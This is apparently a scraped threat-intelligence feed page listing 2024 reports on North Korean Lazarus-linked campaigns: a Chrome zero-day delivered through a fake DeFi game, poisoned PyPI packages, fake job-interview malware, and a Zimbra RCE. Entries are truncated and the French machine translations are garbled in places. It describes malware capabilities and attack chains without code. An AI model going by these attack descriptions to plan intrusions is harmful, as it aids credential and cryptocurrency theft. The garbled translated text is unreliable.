identifiéEmbargo, un groupe Ransomware-as-a-Service ciblant les sociétés américaines, utilisant des outils basés sur la rouille comme Mdeployer et Ms4killer.En utilisant des tactiques à double extorsion, l'embargo personnalise des outils pour désactiver les systèmes de sécurité, chiffrer les fichiers et obtenir de la persistance via des redémarrages en mode sûr et des tâches planifiées. 6. [Lazarus Chrome Exploit Campaign] (https://sip.security.microsoft.com/intel-explorer/articles/e831e4ae): les chercheurs de Kaspersky ont identifié une campagne de Lazarus APT et Bluenoroff (Diamond Sheet and Saphire Sleet), Exploriting A A et Bluenoroff.Vulnérabilité zéro-jour dans Google Chrome pour cibler les amateurs de crypto-monnaie.L'attaque utilise un fau | Ransomware Spam Malware Tool Vulnerability Threat Prediction Medical Cloud Technical | APT 38 Guam | ★★ |
|
2024-10-25 16:11:10 | The Crypto Game of Lazarus APT: Investors vs. Zero-days (lien direct) | ## Snapshot Researchers at Kaspersky identified a cyberattack campaign by the Lazarus APT (tracked by Microsoft as [Diamond Sleet](https://security.microsoft.com/intel-profiles/b982c8daf198d93a2ff52b92b65c6284243aa6af91dda5edd1fe8ec5365918c5)) group and its BlueNoroff subgroup (tracked by Microsoft as [Sapphire Sleet](https://security.microsoft.com/intel-profiles/45e4b0c21eecf6012661ef6df36a058a0ada1c6be74d8d2011ea3699334b06d1)), which exploited a zero-day vulnerability in Google Chrome to execute remote code through a fake decentralized finance (DeFi) game targeting individuals in the cryptocurrency space. ## Description The attackers used a type confusion in V8 vulnerability in Google Chrome\'s Maglev optimizing compiler, [CVE-2024-4947](https://security.microsoft.com/intel-explorer/cves/CVE-2024-4947/), to gain read/write access to the entire address space of the Chrome process. They bypassed the V8 sandbox by exploiting a vulnerability in the Irregexp VM, allowing attackers to access memory outside the bounds of the register arrays, and to manipulate pointers and execute shellcode. The campaign involved social engineering tactics, including a malicious website that offered to download a beta version of the computer game called "DeTankZone" as a lure, which was a modified version of a legitimate game called DeFiTankLand. The initial infiltration was done through a hidden script on the website that exploited the Chrome vulnerabilities, allowing attackers to gain full control of the victim\'s device. The attackers built a presence on social media platforms and attempted to contact cryptocurrency influencers to promote their malicious website. Kaspersky reported the zero-day vulnerability to Google, which [released an update](https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_15.html) to fix the issue in May 2024 on Chrome version 125.0.6422.60/.61. ## Microsoft Analysis and Additional OSINT Context [Microsoft](https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/) attributes this activity to [Moonstone Sleet](https://security.microsoft.com/intel-profiles/8ba84cecf73bd9aca4e4ff90230dc1f277c039f78c40c1938b6f74b1b7cce20f), a threat actor behind a cluster of malicious activity that Microsoft assesses is North Korean state-aligned. Since February 2024, Microsoft has observed Moonstone Sleet infecting devices using the malicious tank game DeTankWar, also called DeFiTankWar, DeTankZone, or TankWarsZone. The game is portrayed as a nonfungible token (NFT)-enabled play-to-earn game, available on Windows, Mac, and Linux. In this campaign, Moonstone Sleet typically approaches its targets through messaging platforms, such as LinkedIn and Telegram, or by email with a link to download the game. When targeted users launch the game, the ZIP file is downloaded, and multiple malicious DLLs are loaded. This leads to connections to command-and-control (C2) infrastructure using a custom malware loader Microsoft calls YouieLoad. YouieLoad loads malicious payloads in memory and creates malicious services that perform functions such as network and user discovery and browser data collection. For compromised devices of particular interest to the group, the threat actor launches hands-on-keyboard commands with further discovery and conducts credential theft. The threat actors presented themselves as game developers seeking investment or developer support and either masquerading as a legitimate blockchain company or using fake companies like one called C.C. Waterfall, a purported IT consulting organization. Moonstone Sleet created a robust public campaign that includes the websites detankwar\[.\]com and defitankzone\[.\]com, and many X (Twitter) accounts for the personas it uses to approach targets and for the game itself. In a similar campaign, Moonstone Sleet sent emails, also using its fake company C.C. Waterfall, where they emailed higher education organizations, again, claiming the company was | Ransomware Malware Tool Vulnerability Threat | APT 38 | ★★ |
 |
2024-10-24 23:33:00 | Le groupe APT Lazarus a exploité une vulnérabilité zero-day dans Chrome pour voler des crypto-monnaies (lien direct) | Les chercheurs du GReAT (Global Research and Analysis Team) de Kaspersky ont découvert une campagne malveillante sophistiquée menée par le groupe APT Lazarus, ciblant les investisseurs en crypto-monnaies du monde entier. Les attaquants ont utilisé un site de phishing imitant un jeu vidéo permettant de gagner des crypto-monnaies, exploitant une vulnérabilité zero-day dans Google Chrome pour installer des logiciels espions et voler les informations d'identification des portefeuilles sur les appareils des victimes. Ces conclusions ont été présentées lors du Security Analyst Summit 2024 à Bali. - Investigations | Vulnerability Threat | APT 38 | ★★ |
|
2024-10-24 17:38:25 | Le groupe Lazarus exploite Chrome 0-Day pour la crypto avec un faux jeu NFT Lazarus Group Exploits Chrome 0-Day for Crypto with Fake NFT Game (lien direct) |
Les pirates nord-coréens du groupe Lazare ont exploité une vulnérabilité zéro-jour dans Google Chrome pour cibler les investisseurs de crypto-monnaie avec & # 8230;
North Korean hackers from Lazarus Group exploited a zero-day vulnerability in Google Chrome to target cryptocurrency investors with… |
Vulnerability Threat | APT 38 | ★★ |
 |
2024-10-24 16:00:00 | Le groupe Lazarus exploite Google Chrome Flaw dans une nouvelle campagne Lazarus Group Exploits Google Chrome Flaw in New Campaign (lien direct) |
Le groupe Lazarus a exploité Google Chrome Zero-Day, infecté les systèmes avec des logiciels malveillants Manuscrypt
Lazarus Group exploited Google Chrome zero-day, infecting systems with Manuscrypt malware |
Malware Vulnerability Threat | APT 38 | ★★ |
|
2024-10-24 15:23:00 | Le groupe Lazarus exploite Google Chrome Vulnérabilité à contrôler les appareils infectés Lazarus Group Exploits Google Chrome Vulnerability to Control Infected Devices (lien direct) |
L'acteur de menace nord-coréen connue sous le nom de groupe Lazare a été attribué à l'exploitation zéro-jour d'un défaut de sécurité désormais réglé dans Google Chrome pour prendre le contrôle des appareils infectés.
Le vendeur de cybersécurité Kaspersky a déclaré avoir découvert une nouvelle chaîne d'attaque en mai 2024 qui ciblait l'ordinateur personnel d'un ressortissant russe sans nom avec la porte dérobée du Manuscrypt.
Cela implique de déclencher le
The North Korean threat actor known as Lazarus Group has been attributed to the zero-day exploitation of a now-patched security flaw in Google Chrome to seize control of infected devices. Cybersecurity vendor Kaspersky said it discovered a novel attack chain in May 2024 that targeted the personal computer of an unnamed Russian national with the Manuscrypt backdoor. This entails triggering the |
Vulnerability Threat | APT 38 | ★★ |
 |
2024-10-24 13:02:10 | Les pirates nord-coréens ont exploité Chrome Zero-Day pour le vol de crypto-monnaie North Korean Hackers Exploited Chrome Zero-Day for Cryptocurrency Theft (lien direct) |
> Le Lazarus APT a créé un site Web trompeur qui a exploité un chrome zéro-jour pour installer des logiciels malveillants et voler la crypto-monnaie.
>The Lazarus APT created a deceptive website that exploited a Chrome zero-day to install malware and steal cryptocurrency. |
Malware Vulnerability Threat | APT 38 | ★★ |
|
2024-10-23 20:55:13 | Le groupe Lazarus exploite Chrome Zero-Day dans la dernière campagne Lazarus Group Exploits Chrome Zero-Day in Latest Campaign (lien direct) |
L'acteur nord-coréen va après les investisseurs de crypto-monnaie dans le monde entier en tirant parti d'un site de jeu d'aspect authentique et d'un contenu et d'images générés par l'IA.
The North Korean actor is going after cryptocurrency investors worldwide leveraging a genuine-looking game site and AI-generated content and images. |
Vulnerability Threat | APT 38 | ★★ |
 |
2024-10-23 11:00:48 | Le jeu crypto de Lazarus APT: Investisseurs vs zéro-jours The Crypto Game of Lazarus APT: Investors vs. Zero-days (lien direct) |
Les grands experts de Kaspersky décomposent la nouvelle campagne de Lazarus APT qui utilise l'ingénierie sociale et exploite une vulnérabilité zéro-jour dans Google Chrome à des fins financières.
Kaspersky GReAT experts break down the new campaign of Lazarus APT which uses social engineering and exploits a zero-day vulnerability in Google Chrome for financial gain. |
Vulnerability Threat | APT 38 | ★★ |
|
2024-10-21 11:41:26 | Faits saillants hebdomadaires OSINT, 21 octobre 2024 Weekly OSINT Highlights, 21 October 2024 (lien direct) |
## Instantané La semaine dernière, les rapports OSINT de \\ mettent en évidence une gamme diversifiée de cybermenaces et d'évolution des vecteurs d'attaque.L'ingénierie sociale reste une tactique répandue, avec des campagnes telles que ClickFix tirant parti de faux messages d'erreur pour distribuer des logiciels malveillants, tandis que la campagne d'interview contagieuse CL-Sta-240 cible les demandeurs d'emploi en utilisant des logiciels malveillants déguisés en applications d'appel vidéo.Les voleurs d'informations, tels que Lumma et Meduza, continuent de proliférer et de tirer parti des plates-formes distribuées comme Telegram et Github.Les acteurs de ransomware exploitent les services cloud, comme le montre la campagne Ransomware abusant Amazon S3.Des groupes de l'État-nation, dont la Corée du Nord, l'Iran et la Chine, persistent à cibler des infrastructures critiques et des entités gouvernementales utilisant des techniques d'évasion sophistiquées et des outils open source, tandis que les acteurs motivés financièrement se concentrent sur les chevaux de Troie bancaires et le vol de crypto-monnaie.Ces tendances soulignent la sophistication et la diversité croissantes des acteurs de la menace \\ 'tactiques, à la fois avec les APT de l'État-nation et les cybercriminels ciblant un large éventail de secteurs. ## Description 1. [ClickFix Social Engineering Tactic] (https://sip.security.microsoft.com/intel-explorer/articles/6d79c4e3): Les chercheurs de Sekoia ont identifié Clickfix, une nouvelle tactique d'ingénierie sociale tirant parti de faux messages d'erreur de navigateur pour exécuter Male PowerShell malveillantCommandes.Il a été utilisé par des groupes comme l'Empire national slave et Scamquerteo pour distribuer des infostelleurs, des rats et des botnets ciblant la crypto-monnaie et les utilisateurs de Web3. 2. [Lumma Stealer Distribution via Hijackloader] (https://sip.security.microsoft.com/intel-explorer/articles/ef6514e6): les chercheurs de HarfangLab ont observé une augmentation de la distribution de voleur Lumma en utilisant Hijackloader avec des certificats de signature de code pour les défenses de bypass Lumma.Ces campagnes ont ciblé les utilisateurs à travers de fausses pages CAPTCHA, conduisant à une exécution de logiciels malveillants avec des certificats signés de sociétés légitimes. 3. [Meduza Stealer Spread via Telegram] (https://sip.security.microsoft.com/intel-explorer/articles/ac988484): CERT-UA a rapporté le voleur de Meduza distribué par des messages télégramme, exhortant les utilisateurs à télécharger "Special Special.logiciel."Les logiciels malveillants ont ciblé les entreprises ukrainiennes et volé des documents avant l'auto-délétion pour éviter la détection. 4. [Ransomware exploitant Amazon S3] (https://sip.security.microsoft.com/intel-explorer/articles/f5477a4): TrendMicro a identifié une campagne de ransomware exploitant la fonction d'accélération d'Amazon S3 \\ S pour l'expiltration de données.Déguisé en Lockbit, ce ransomware cible Windows et MacOS, en utilisant des informations d'identification AWS pour les téléchargements de données tout en tirant parti des techniques de chiffrement aux victimes de pression. 5. [AI abusité dans les opérations cyber] (https://sip.security.microsoft.com/intel-explorer/articles/e46070dd): OpenAI a rapporté plus de 20 cas d'utilisation abusive de l'IA par des acteurs malveillants pour le développement de logiciels malveillants, la désinformation et la lancePhishing.Les acteurs de la menace, dont Storm-0817 et SweetSpecter, ont exploité l'IA pour des tâches telles que la reconnaissance et le débogage du code, tandis que les IOS secrets ont été retracés en Iran et au Rwanda. 6. [Variants de trojan bancaires Trickmo] (https://sip.security.microsoft.com/intel-explorer/articles/1f1ea18b): les chercheurs de zimpérium ont découvert 40 variantes de tro-bancs Trickmo capables de l'interception OTP, de l'enregistrement de l'écran et de dispositif de dispositif de dispos | Ransomware Malware Tool Vulnerability Threat Cloud | APT 38 APT 37 APT-C-17 | ★★ |
|
2024-10-15 21:16:48 | Les acteurs nord-coréens ciblent les demandeurs d'emploi technologiques avec des logiciels malveillants multiplateformes North Korean Actors Target Tech Job Seekers with Cross-Platform Malware (lien direct) |
## Snapshot Researchers at Unit 42 have observed additional online activity by Democratic People\'s Republic of Korea (DPRK) threat actors, activity Unit 42 dubbed CL-STA-240 Contagious Interview, targeting individuals seeking tech industry jobs on platforms like LinkedIn. The threat actors pose as fake recruiters and use social engineering tactics to convince job seekers to download malware disguised as legitimate video call applications such as MiroTalk and FreeConference, delivering updated versions of BeaverTail and InvisibleFerret malware. ## Description Unit 42 initially published the [Contagious Interview campaign](https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/) in November 2023. Since then, more fake recruiters have been reported and the malware has been observed with updated code. Specifically, the BeaverTail malware has been recompiled using the [Qt framework](https://wiki.qt.io/About_Qt). Qt allows developers to build cross-platform applications, enabling attackers to use a single source code base to generate applications for both Windows and macOS at the same time. The malware is capable of stealing credentials from 13 different cryptocurrency wallets in both MacOS and Windows, and browser passwords in MacOS. BeaverTail functions as a downloader and [infostealer](https://sip.security.microsoft.com/intel-profiles/2296d491ea381b532b24f2575f9418d4b6723c17b8a1f507d20c2140a75d16d6), facilitating initial access by retrieving and executing malicious payloads on the compromised systems. The infection chain culminates with the deployment of the InvisibleFerret Python backdoor, which has capabilities for fingerprinting the infected endpoint, remote control, keylogging, exfiltrating sensitive files, and downloading the AnyDesk client for additional remote access. ## Recommendations Microsoft recommends mitigations to reduce the impact of this threat. - Only install applications from trusted sources and official stores. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants. - Turn on[tamper protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?ocid=magicti_ta_learndoc) features to prevent attackers from stopping security services. - Run [endpoint detection and response (EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?ocid=magicti_ta_learndoc), so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\'t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach. - Enable [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?ocid=magicti_ta_learndoc) in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. - Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/en-us/windows/security/operating-system-security/virus-and-threat-protection/microsoft-defender-smartscreen/), which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware. - For information on password management read [here](https://learn.microsoft.com/en-us/deployedge/microsoft-edge-security-password-manager-security). - For information on social engineering prevention, read [here](https://www.microsoft. | Malware Tool Threat | APT 38 | ★★★ |
|
2024-10-02 20:01:11 | Zimbra RCE Vuln Under Attack Needs Immediate Patching (lien direct) | ## Instantané Les chercheurs de ProofPoint ont identifié l'exploitation active d'une vulnérabilité d'exécution de code à distance sévère dans le serveur SMTP de Zimbra \\, suivi comme [CVE-2024-45519] (https://cve.mitre.org/cgi-bin/cvename.cgi.? name = CVE-2024-45519).La vulnérabilité, qui existe dans le composant de service Zimbra Postjournal utilisé pour la journalisation et l'archivage par e-mail, permet aux attaquants distants non authentifiés d'exécuter des commandes arbitraires et potentiellement de prendre le contrôle des systèmes affectés. ## Description À partir du 28 septembre, des chercheurs de preuve Point ont observé que les attaquants envoyaient des e-mails usurpés aux serveurs vulnérables Zimbra.Les e-mails, qui semblent provenir de Gmail, ont un code malveillant codé de base64 dans le champ CC.Ce code est conçu pour s'exécuter sous forme de commandes de shell sur les serveurs Zimbra vulnérables.L'analyse de Proofpoint \\ a révélé que les e-mails malveillants proviennent d'un serveur en Bulgarie et que le même serveur est utilisé pour envoyer des e-mails d'exploitation et l'hébergement de la charge utile de deuxième étape.Cela suggère une opération relativement non sophistiquée. Le volume d'attaques a été cohérent depuis leur début et semble être opportuniste plutôt que ciblé.La vulnérabilité a été initialement identifiée par Project Discovery, qui a publié une preuve de concept et a noté que le problème découle d'un incapacité à désinfecter correctement la saisie des utilisateurs.Zimbra a publié des mises à jour pour la vulnérabilité mais n'a pas divulgué les détails de la faille.La popularité de la suite de collaboration Zimbra, utilisée par des milliers d'entreprises et des millions d'utilisateurs, en fait une cible importante pour les attaquants, comme en témoignent les exploits précédents par des acteurs chinois APT et le groupe de Lazarus de la Corée du Nord. ## Analyse Microsoft La suite de collection Zimbra est utilisée par des milliers d'entreprises et des millions d'utilisateurs, ce qui en fait une cible significative pour les attaquants.Microsoft a observé des acteurs tels que [Midnight Blizzard] (https://sip.security.microsoft.com/intel-profiles/d825313b053efea45228ff1f4cb17c8b5433dcd2f86353e28be2d484ce874616). titulaireity.microsoft.com/intel-profiles/19c1e80fc71ceb06a7b7cd8034e5b7b74e5c1775e4def24e9c7cf9b9b9fcf135), et Storm-1219] (https://sip. 80735988A5E5BE32EC07DB02D6CFA1A192753FB7545B099A04D0071), ciblant d'autres vulnérabilités de Zimbra, y compris [CVE-2019-9670] (https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-9670) et [CVE-2022-41352] (https://security.microsoft.com/vulnerabilities/Vulnérabilité / CVE-2022-41352 / Présentation? TID = F839B112-D9D7-4D27-9BF6-94542403F21C? OCID = Magicti_TA_TA2).AjoutAlly, en juillet 2024, [enregistré le groupe insikt de Future \\ a été rapporté] (https://sip.security.microsoft.com/intel-explorer/articles/7df80747) sur le groupe de menaces TAG-100 exploitant [CVE-2019-9621] (https://sip.security.microsoft.com/intel-explorer/cves/cve-2019-9621/) dans la suite de collaboration Zimbra pour cibler les organisations du gouvernement, intergouvernemental et des secteurs privé dans le monde. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace.Vérifiez la carte de recommandations pour l'état de déploiement des atténuations surveillées. - Exécuter [Détection et réponse de point de terminaison (EDR) en mode bloc] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-lock-modeBloquer des artefacts malveillants, même lorsque votre antivirus non microsoft ne détecte pas la menace ou lorsque Microsoft Defender Antivirus fonctionne en mode passif.EDR en mode bloc fonctionne dans les coulisses pour corriger les artefacts malveillants qui sont détectés post-abri. - Allumez [Protection en cloud-étirement] (https://learn.microsoft.com/microsoft-365 | Tool Vulnerability Threat Patching | APT 38 | ★★ |
|
2024-09-23 12:09:00 | New Pondrat malware caché dans des packages Python cible les développeurs de logiciels New PondRAT Malware Hidden in Python Packages Targets Software Developers (lien direct) |
Des acteurs de menaces avec des liens avec la Corée du Nord ont été observés en utilisant des forfaits Python empoisonnés comme moyen de livrer un nouveau malware appelé Pondrat dans le cadre d'une campagne en cours.
Pondrat, selon de nouvelles résultats de l'unité Palo Alto Networks 42, est évaluée comme une version plus légère de Poolrat (alias Simplesea), une porte dérobée macOS connue qui a été précédemment attribuée au groupe Lazare et déployé dans
Threat actors with ties to North Korea have been observed using poisoned Python packages as a way to deliver a new malware called PondRAT as part of an ongoing campaign. PondRAT, according to new findings from Palo Alto Networks Unit 42, is assessed to be a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor that has been previously attributed to the Lazarus Group and deployed in |
Malware Threat | APT 38 | ★★ |
|
2024-09-20 15:50:36 | Le groupe nord-coréen APT Gleaming Poissons déploie le Pondrat via des forfaits Python empoisonnés North Korean APT Group Gleaming Pisces Deploys PondRAT via Poisoned Python Packages (lien direct) |
## Instantané Les chercheurs de l'unité 42 ont identifié une campagne de logiciels malveillants en cours impliquant des forfaits Python empoisonnés, qu'ils ont nommés Pondrat. ## Description La campagne offre des logiciels malveillants de porte dérobée ciblant les systèmes Linux et MacOS via des packages infectés dans PYPI, un référentiel populaire pour le logiciel Python.Les attaquants ont téléchargé plusieurs packages malveillants qui ont conduit à l'installation d'un outil d'accès à distance (RAT).Sur la base de similitudes de code importantes et de recherches publiques antérieures, la campagne a été attribuée à Gleaming Poissons, un groupe d'acteurs de menaces nord-coréen suivis par Microsoft en tant que [Citrine Sleet] (https://security.microsoft.com/intel-profiles/byexternalid/69A6F70FA93E58F1412BF8DBFF92F001E83A5A27AF77FE7A0BF52E4E394EF623).L'unité 42 évalue ce groupe est associé à la campagne d'Applejeus et a des liens avec le Bureau général de reconnaissance du gouvernement nord-coréen. Les Poissons brillants sont connus pour cibler le secteur des crypto-monnaies, et les chercheurs de l'unité 42 pensent que le but de cette campagne est d'accéder aux développeurs \\ 'et, à travers eux, à compromettre la chaîne d'approvisionnement et les clients des fournisseurs.L'analyse des logiciels malveillants a révélé des similitudes entre Pondrat et un rat macOS précédemment connu appelé Poolrat, solidifiant davantage la connexion avec des Poissons étincelés.Les deux familles de logiciels malveillants partagent des structures de code communes, des noms de fonction, des clés de chiffrement et des flux d'exécution. La stratégie de l'acteur de menace consiste à télécharger ces packages Python empoisonnés à PYPI, qui, lorsqu'il est installé, télécharge et exécute du code malveillant qui infecte la machine de la victime.Cette méthode d'attaque permet aux logiciels malveillants d'échapper à la détection et de rester cachés, posant un risque important pour les organisations qui s'appuient sur des logiciels open-source.Les chercheurs ont également découvert que Pondrat est une version plus légère de Poolrat, suggérant que les logiciels malveillants ont évolué pour répondre à différents besoins opérationnels entre les systèmes Linux et MacOS.Les forfaits empoisonnés ont depuis été retirés du PYPI, mais la menace souligne les dangers des attaques de chaîne d'approvisionnement. ## Analyse Microsoft L'acteur de menaceque Microsoft suit comme [Citrine Sleet] (https://security.microsoft.com/intel-profiles/byexternalid/69a6f70fa93e58f1412bf8dbff92f001e83a5a27af77fe7a0bf52e4e394EF623) est basé en Corée du Nord et cible principalement les institutions financières, en particulier les organisations et les individus qui gèrent la crypto-monnaie, à des fins financières.Dans le cadre de ses tactiques d'ingénierie sociale, Citrine Sleet a réalisé une reconnaissance approfondie de l'industrie des crypto-monnaies et des individus qui y sont associés.L'acteur de menace crée de faux sites Web se faisant passer pour des plates-formes de trading de crypto-monnaie légitimes et les utilise pour distribuer de fausses applications de travail ou attirer des cibles dans le téléchargement d'un portefeuille de crypto-monnaie ou une application de trading armée basée sur des applications légitimes.Le grésil citrine infecte le plus souvent les cibles avec le logiciel malveillant unique qu'il a développé, [Applejeus] (https: // Security.Microsoft.com/intel-profiles/796c7ccf162d06ceaa32e04c82cd7b8025abe1d155a358319286012107a6b838?ocid=magicti_ta_ta2), qui collecte les informations nécessaires à la lutteActifs de crypto-monnaie. Citrine Sleet est suivi par d'autres sociétés de sécurité sous le nom d'Applejeus, Labyrinth Chollima, UNC4736 et Hidden Cobra, et a été attribué au Bureau 121 du Bureau général de reconnaissance de la Corée du Nord. ## Recommandations Appliquez ces atténuations pour réduire | Malware Tool Threat | APT 38 | ★★★ |
 |
2024-09-12 14:11:31 | 2023-11-23 BEAVERTAIL AND INVISIBLE_FERRET LAZARUS GROUP MALWWare Samples 2023-11-23 BEAVERTAIL and INVISIBLE_FERRET Lazarus Group Malware Samples (lien direct) |
 2023-11-23 Palo Alto Unit42: Hacking Employers and Seeking Employment: Two Job-Related This is a 2023 article by Unit42 covering two cyber campaigns, "Contagious Interview" (CL-STA-0240) and "Wagemole" (CL-STA-0241), linked to the Lazarus group (North Korea). There is a more recent campaign VMCONNECT described by Reversing Labs here 2024-09-10 Fake recruiter coding tests target devs with malicious Python packages but I don\'t have samples for that one. These campaigns target job-seeking activities to deploy malware and conduct espionage. Contagious Interview (CL-STA-0240):The campaign targets software developers by posing as employers and convincing them to download malicious NPM packages during fake job interviews. The malware, BeaverTail and InvisibleFerret, is cross-platform, running on Windows, Linux, and macOS.BeaverTail: A JavaScript-based malware that steals cryptocurrency wallet information and loads the second-stage payload, InvisibleFerret.InvisibleFerret: A Python-based backdoor with capabilities including fingerprinting, remote control, keylogging, and browser credential theft. It communicates with a C2 server using JSON-formatted messages and supports commands for data exfiltration and additional malware deployment.The threat actors use GitHub to host malicious NPM packages, creating accounts with minimal activity to avoid detection.Wagemole (CL-STA-0241):Wagemole involves North Korean actors using fake identities to apply for remote IT jobs, likely to funnel wages to North Korea\'s weapons programs and potentially conduct espionage.Exposed Infrastructure: Researchers found resumes, interview scripts, and other fraudulent materials on GitHub. These documents impersonate IT professionals and aim to gain unauthorized employment at US companies.Download |
Malware Threat | APT 38 | ★★ |
|
2024-09-09 11:04:46 | Faits saillants hebdomadaires OSINT, 9 septembre 2024 Weekly OSINT Highlights, 9 September 2024 (lien direct) |
## Snapshot Last week\'s OSINT reporting highlights a broad spectrum of cyber threats with notable trends in malware campaigns, espionage, and ransomware attacks. Phishing remains a dominant attack vector, delivering a variety of payloads like custom backdoors, infostealers, and ransomware. Nation-state actors such as Russia\'s APT29 (Midnight Blizzard) and China\'s Earth Lusca were prominent, focusing on espionage and targeting specific regions like East Asia and the Middle East. Other notable threats included the use of deepfakes for scam campaigns and the exploitation of unpatched vulnerabilities in widely used software like Microsoft Office and WPS Office. The targeting of organizations ranged from government entities to private sector businesses, with some attacks focusing on specific industries like finance, healthcare, and technology. ## Description 1. [Unique Malware Campaign \'Voldemort\'](https://sip.security.microsoft.com/intel-explorer/articles/3cc65ab7): Proofpoint researchers uncovered a phishing campaign distributing custom malware via emails impersonating tax authorities across multiple countries. The malware, likely motivated by espionage, uses advanced techniques like abusing Google Sheets for command-and-control (C2) to avoid detection. 2. [Python-Based Infostealer \'Emansrepo\'](https://sip.security.microsoft.com/intel-explorer/articles/94d41800): FortiGuard Labs identified Emansrepo, a Python-based infostealer targeting browser data and files via phishing emails. The malware has evolved into a sophisticated multi-stage tool, expanding its capabilities to steal sensitive data like cryptocurrency wallets. 3. [Deepfake Scams Using Public Figures](https://sip.security.microsoft.com/intel-explorer/articles/6c6367c7): Palo Alto Networks researchers discovered deepfake scams impersonating public figures to promote fake investment schemes. These scams, involving a single threat actor group, target global audiences with AI-generated videos hosted on domains with significant traffic. 4. [Zero-Day Vulnerabilities in WPS Office](https://sip.security.microsoft.com/intel-explorer/articles/f897577d): ESET researchers identified two zero-day vulnerabilities in Kingsoft WPS Office exploited by the APT-C-60 group. The vulnerabilities allowed attackers to execute arbitrary code in targeted East Asian countries, using malicious documents to deliver a custom backdoor. 5. [KTLVdoor Malware Campaign](https://sip.security.microsoft.com/intel-explorer/articles/222628fc): Trend Micro uncovered KTLVdoor, a highly obfuscated backdoor developed by Earth Lusca, targeting Windows and Linux systems. The malware allows attackers to fully control infected systems and is primarily linked to Chinese-speaking actors. 6. [Fake Palo Alto GlobalProtect Tool](https://sip.security.microsoft.com/intel-explorer/articles/22951902): Trend Micro identified a campaign targeting Middle Eastern organizations with a fake version of Palo Alto GlobalProtect. The malware executes remote PowerShell commands and exfiltrates files while masquerading as a legitimate security solution. 7. [APT29 Targets Mongolian Government Websites](https://sip.security.microsoft.com/intel-explorer/articles/12b5ac31): Google TAG discovered that Russian APT29 used iOS and Chrome exploits to target Mongolian government websites. The attack, linked to commercial surveillance vendors, involved watering hole attacks to steal authentication cookies from targeted users. 8. [MacroPack-Abused Malicious Documents](https://sip.security.microsoft.com/intel-explorer/articles/cd8dec3b): Cisco Talos found malicious documents leveraging MacroPack to deliver payloads like Havoc and PhantomCore RAT. These documents used obfuscated macros and lures in multiple languages, complicating attribution to any single threat actor. 9. [Underground Ransomware by RomCom Group](https://sip.security.microsoft.com/intel-explorer/articles/e2a44c7c): FortiGuard Labs identified the Underground ransomware targeting Windows systems, deployed by the Russia-based RomCom | Ransomware Malware Tool Vulnerability Threat Prediction Medical Commercial | APT 38 APT 29 | ★★ |
|
2024-09-06 20:50:58 | (Déjà vu) APT Lazarus: castors cryptographiques avides, appels vidéo et jeux APT Lazarus: Eager Crypto Beavers, Video calls and Games (lien direct) |
## Instantané Group-IB a publié un rapport détaillant l'activité du groupe de Lazare qui cible les demandeurs d'emploi par de fausses entretiens.La campagne attire des victimes de téléchargement du logiciel malveillant déguisé en projet Node.js, qui contient le malware de Beavertail, conduisant finalement au déploiement d'une porte dérobée python connue sous le nom d'invisibleferret. ## Description La chaîne d'infection commence lorsque les victimes sont contactées via des plateformes de recherche d'emploi comme LinkedIn, Moonlight ou Upwork.Les conversations sont ensuite souvent déplacées vers Telegram, où les victimes sont trompées pour télécharger une fausse application de conférence vidéo ou un projet Node.js pour une tâche d'entrevue supposée.Ces applications sont en fait malveillantes, contenant des charges utiles qui volent des données sensibles aux navigateurs, aux portefeuilles de crypto-monnaie et à d'autres sources. BEAVERTail Malware, initialement développé par les acteurs de la menace en tant qu'outil basé sur JavaScript, a évolué pour inclure les versions macOS et Python natives.La version Windows arrive via un fichier d'installation nommé FCCCALL, qui se présente comme une application de vidéoconférence légitime.Lors de l'exécution, FccCall imite les interfaces logicielles légitimes tout en exécutant des processus d'arrière-plan malveillants qui exfiltrent les informations d'identification du navigateur, les données de portefeuille de crypto-monnaie, etc. La variante Beavertail Python a introduit des composants modulaires, nommés collectivement CIVETQ, qui élargissent les capacités du malware \\.Les modules CIVETQ se concentrent sur des tâches telles que le keylogging, le vol de presse-papiers, l'exfiltration des données du navigateur et l'établissement de persistance sur les plates-formes Windows, MacOS et Linux.La version Python configure également AnyDesk pour un accès sans surveillance, permettant aux attaquants de maintenir un pied sur des systèmes compromis sans interaction utilisateur. InvisibleFerret, une porte arrière basée sur Python, est un autre composant important utilisé dans ces campagnes.Il dispose de la télécommande, de la clé de clés et des capacités de vol de données du navigateur, avec des mises à jour récentes incorporant des techniques d'obfuscation plus avancées et des méthodes supplémentaires d'exfiltration de données, y compris via Telegram.Beavertail et InvisibleFerret sont en cours de développement actif, les mises à jour fréquentes étant déployées pour améliorer la furtivité et l'efficacité. Le groupe Lazare utilise également des référentiels malveillants sur les plates-formes de partage de code pour distribuer des projets Node.js transversaux.Ces référentiels ciblent souvent les professionnels des secteurs de la crypto-monnaie et des jeux en se faisant passer pour des projets de développement légitimes.Lazarus met à jour en permanence ces référentiels, en utilisant des techniques d'obscurcissement et en manipulant la visibilité du référentiel pour échapper à la détection. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/en-us/defender-endpoint/linux-preférences) dans Microsoft Defender Antivirus ou l'équivalent de votre produit antivirus pour couvrir 